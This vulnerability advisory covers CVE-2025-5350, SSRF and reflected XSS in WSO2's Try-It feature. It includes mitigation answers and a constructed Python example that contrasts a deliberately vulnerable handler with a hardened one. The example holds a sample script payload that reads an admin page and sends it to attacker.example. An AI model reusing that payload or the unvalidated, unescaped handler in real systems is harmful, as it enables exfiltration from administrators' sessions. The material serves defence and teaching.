CVE-2025-5350
BaseFortify

Publication date: 2025-10-24

Last updated on: 2025-11-21

Assigner: WSO2 LLC

Description
SSRF and Reflected XSS Vulnerabilities exist in multiple WSO2 products within the deprecated Try-It feature, which was accessible only to administrative users. This feature accepted user-supplied URLs without proper validation, leading to server-side request forgery (SSRF). Additionally, the retrieved content was directly reflected in the HTTP response, enabling reflected cross-site scripting (XSS) in the admin user's browser context. By tricking an administrator into accessing a crafted link, an attacker could force the server to fetch malicious content and reflect it into the admin’s browser, leading to arbitrary JavaScript execution for UI manipulation or data exfiltration. While session cookies are protected with the HttpOnly flag, the XSS still poses a significant security risk. Furthermore, SSRF can be used by a privileged user to query internal services, potentially aiding in internal network enumeration if the target endpoints are reachable from the affected product.
Affected Vendors & Products
22 associated CPEs
Vendor Product Version / Range
wso2 api_control_plane 4.5.0
wso2 api_manager 3.1.0
wso2 api_manager 3.2.0
wso2 api_manager 3.2.1
wso2 api_manager 4.0.0
wso2 api_manager 4.1.0
wso2 api_manager 4.2.0
wso2 api_manager 4.3.0
wso2 api_manager 4.4.0
wso2 api_manager 4.5.0
wso2 enterprise_integrator 6.6.0
wso2 identity_server 5.10.0
wso2 identity_server 5.11.0
wso2 identity_server 6.0.0
wso2 identity_server 6.1.0
wso2 identity_server 7.0.0
wso2 identity_server 7.1.0
wso2 identity_server_as_key_manager 5.10.0
wso2 open_banking_am 2.0.0
wso2 open_banking_iam 2.0.0
wso2 traffic_manager 4.5.0
wso2 universal_gateway 4.5.0
CWE
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability involves SSRF (Server-Side Request Forgery) and reflected XSS (Cross-Site Scripting) in multiple WSO2 products within a deprecated Try-It feature accessible only to administrative users. The feature accepted user-supplied URLs without proper validation, allowing an attacker to make the server fetch malicious content. This content was then reflected in the admin user's browser, enabling arbitrary JavaScript execution. This can be exploited by tricking an administrator into clicking a crafted link, leading to UI manipulation or data theft.


How can this vulnerability impact me?

An attacker who lures an administrator to a crafted Try-It link can execute arbitrary JavaScript in the context of the administrator's browser session, manipulating the management UI or exfiltrating data. The HttpOnly flag on the session cookie stops the script from reading the cookie, but not from issuing requests to the product on the administrator's behalf, because the browser attaches the cookie to those requests automatically. Separately, a privileged user can use the SSRF to make the product fetch URLs that are reachable from the server, which aids enumeration of internal services that are not exposed externally.


What immediate steps should I take to mitigate this vulnerability?

Apply the vendor fix for the affected product version where one is available. Until then, disable or remove the deprecated Try-It feature; restrict administrative access to trusted users and, where possible, to trusted networks; and restrict outbound connections from the product host to the backends it genuinely needs, which limits what the SSRF can reach. Any replacement for Try-It must validate user-supplied URLs against an allowlist of scheme and host, reject destinations that resolve to internal or link-local addresses, and never reflect fetched content into an HTML response without output encoding.
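As an added illustration (this is not WSO2 code; the handler, hostnames, addresses and response bodies are constructed for this page), the following Python models the pattern the description and the mitigation answer above describe: a Try-It style handler that fetches a caller-supplied URL server-side and reflects the body into an HTML page, next to a hardened handler that allowlists the destination host, rejects destinations that resolve to non-public addresses, and returns the fetched body escaped and as non-executable text with a restrictive CSP.

```python
"""Constructed model of the Try-It flaw pattern in CVE-2025-5350 (CWE-918 +
CWE-79): a handler fetches an attacker-chosen URL server-side and echoes the
body into an HTML response. Nothing here is WSO2 code; hosts, addresses and
bodies are made up so the example runs offline."""
import html
import ipaddress
from urllib.parse import urlparse

# Constructed "network": what the server-side HTTP client would get back.
FAKE_NETWORK = {
    "http://attacker.example/payload.html":
        "<script>fetch('/admin/users').then(r=>r.text())"
        ".then(t=>navigator.sendBeacon('https://attacker.example/x',t))</script>",
    "http://10.0.0.5:8080/internal/": "internal-admin-console 1.2 (no auth)",
    "https://backend.example/health": '{"status":"ok"}',
}

# Constructed DNS table; 5.6.7.8 and 1.2.3.4 stand in for public addresses.
FAKE_DNS = {"attacker.example": "5.6.7.8", "backend.example": "1.2.3.4"}


def fake_fetch(url: str) -> str:
    """Stand-in for the product's outbound HTTP client (no redirects modelled)."""
    if url not in FAKE_NETWORK:
        raise ConnectionError(f"unreachable: {url}")
    return FAKE_NETWORK[url]


def vulnerable_try_it(url: str) -> dict:
    """The flaw as described: no validation of `url`, and the fetched body is
    reflected raw into an HTML page, so a <script> in it runs as the admin."""
    return {"status": 200,
            "headers": {"Content-Type": "text/html"},
            "body": "<h1>Try-It result</h1>" + fake_fetch(url)}


def validate_target_url(url: str, allowed_hosts: set[str],
                        resolve=FAKE_DNS.get) -> str:
    """Return `url` if it is safe to fetch, else raise ValueError with the reason.
    `resolve` is injectable so the check can be exercised offline."""
    p = urlparse(url)
    if p.scheme not in ("http", "https"):           # no file:, gopher:, ftp: ...
        raise ValueError("scheme not allowed")
    if not p.hostname or p.username or p.password:  # no http://trusted@evil/ tricks
        raise ValueError("missing host or userinfo present")
    host = p.hostname.lower()
    if host not in allowed_hosts:                   # positive allowlist, never a denylist
        raise ValueError(f"host {host!r} not in allowlist")
    try:                                            # literal IP, or resolve the name
        ip = ipaddress.ip_address(host)
    except ValueError:
        addr = resolve(host)
        if addr is None:
            raise ValueError(f"cannot resolve {host!r}") from None
        ip = ipaddress.ip_address(addr)
    # is_global is False for loopback, RFC 1918, link-local (169.254.169.254
    # cloud metadata), multicast and reserved space. A real client must repeat
    # this check on every redirect hop and connect to this exact address; a
    # DNS answer that changes between check and connect (rebinding) otherwise
    # re-opens the hole.
    if not ip.is_global:
        raise ValueError(f"{host!r} resolves to non-public address {ip}")
    return url


def hardened_try_it(url: str, allowed_hosts: set[str]) -> dict:
    """Validated destination plus a non-executable, HTML-escaped reflection."""
    try:
        target = validate_target_url(url, allowed_hosts)
    except ValueError as e:
        return {"status": 400, "headers": {"Content-Type": "text/plain"},
                "body": f"rejected: {e}"}
    body = fake_fetch(target)
    return {"status": 200,
            "headers": {"Content-Type": "text/plain; charset=utf-8",
                        "X-Content-Type-Options": "nosniff",
                        "Content-Security-Policy": "default-src 'none'"},
            "body": html.escape(body)}
```

Two design points are worth noting. The allowlist is checked before resolution so an unapproved host is never even looked up, and the resolved-address check is still applied afterwards so that an allowlisted name cannot be pointed at an internal address by whoever controls its DNS. The in-memory fetch does not follow redirects; with a real HTTP client, redirects must either be disabled or re-validated hop by hop, and the connection should be made to the address that passed the check rather than resolved a second time.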

